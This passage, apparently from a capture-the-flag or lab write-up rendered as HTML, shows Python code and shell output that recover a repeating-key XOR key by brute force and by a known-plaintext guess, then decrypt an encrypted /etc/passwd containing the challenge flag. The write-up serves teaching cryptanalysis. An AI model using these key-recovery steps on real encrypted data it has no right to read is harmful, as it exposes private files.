class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">cycle<\/span>\n\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">def<\/span> <span class=\"nf\" style=\"background: #263238;color: #82AAFF\">brute<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">base64<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">b64decode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">decode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">key_data<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[]<\/span>\n\n     <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n         <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">test<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">product<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">string<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printable<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">repeat<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n\n             <span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">test<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"DATA=\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]:<\/span>\n                 <span class=\"n\" style=\"background: #263238;color: #EFF\">key_data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">append<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">test<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n                 <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'ERROR NO \"DATA=\" IN MESSAGE'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n                 <span class=\"k\" style=\"background: #263238;color: #BB80B3\">break<\/span>   \n\n     <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"sa\" style=\"background: #263238;color: #BB80B3\">f<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"found the first 5 chars or the key: <\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key_data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n\n     <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>  <span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\"># at most 15 padded characters<\/span>\n         <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"sa\" style=\"background: #263238;color: #BB80B3\">f<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"assuming the last <\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\"> chars are padded:\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n         <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">perm<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">product<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">string<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printable<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">repeat<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n             <span class=\"n\" style=\"background: #263238;color: #EFF\">padded_part<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">' '<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span>  <span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):])<\/span>\n             <span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key_data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">perm<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">padded_part<\/span>\n             <span class=\"n\" style=\"background: #263238;color: #EFF\">dec<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">x<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">y<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">x<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">y<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">zip<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">cycle<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)))<\/span>\n\n         <span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">re<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">findall<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"sa\" style=\"background: #263238;color: #BB80B3\">r<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'.*usd\\{[0-9A-Za-z]<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">{20}<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">\\}.*'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">dec<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">and<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">dec<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\" \"<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n         <span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\"># since we know \/etc\/passwd was encrypted we can look for standard lines like \"DATA=root:x:0:0::\/root:\/bin\/bash\" or similar strings to verify that we have guessed the correct key<\/span>\n             <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Found Match!'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n             <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Cleartext: '<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">dec<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n             <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Key: '<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n\n<span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">brute<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'FTEjcAhDLjwwTh1IAQ9pTkgKQxU+BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU\/PxMFSEVFKDwqRVdBBQBvQw8fHhI+HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFEVo='<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<\/pre><\/div>\n\n\n\n<p>Executing it provides us the encryption key:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>python sol.py\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">found the first 5 chars or the key: Qpw15<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">assuming the last 15 chars are padded:<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">assuming the last 14 chars are padded:<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">assuming the last 13 chars are padded:<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">assuming the last 12 chars are padded:<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Found Match!<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Cleartext: DATA=root:x:0:0::\/root:\/bin\/bash<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">user:x:10000:10000:usd{badEncryption1234567}:\/home\/user:\/bin\/bash<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">bin:x:1:1::\/:\/usr\/bin\/nologin <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Key: Qpw151ASDter15Ytr%1z<\/span>\n<\/pre><\/div>\n\n\n\n<p>In a different approach, since we know that <strong>\/etc\/passwd<\/strong> was encrypted, we can assume that the first line in the passwd file is <strong>root:x:0:0::\/root:\/bin\/bash<\/strong>.\nWith this assumption, the key can also be recovered:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">student<\/span><span class=\"nd\" style=\"background: #263238;color: #82AAFF\">@host<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">~<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">$<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">python<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">itertools<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">cycle<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">base64<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">base64<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">b64decode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FTEjcAhDLjwwTh1IAQ9pTkgKQxU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PxMFSEVFKDwqRVdBBQBvQw8fHhI<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFE<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">decode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">guess<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'DATA=root:x:0:0::\/root:\/bin\/bash'<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">m<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">m<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">zip<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[:<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">],<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">guess<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[:<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]))<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">message<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">x<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">y<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">x<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">y<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">zip<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cipher<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">cycle<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)))<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;&gt;&gt;<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"sa\" style=\"background: #263238;color: #BB80B3\">f<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Key is <\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\"> <\/span><span class=\"se\" style=\"background: #263238;color: #EFF\">\\n<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">Message: <\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">message<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n<\/pre><\/div>\n\n\n\n<div class=\"codehilite\" 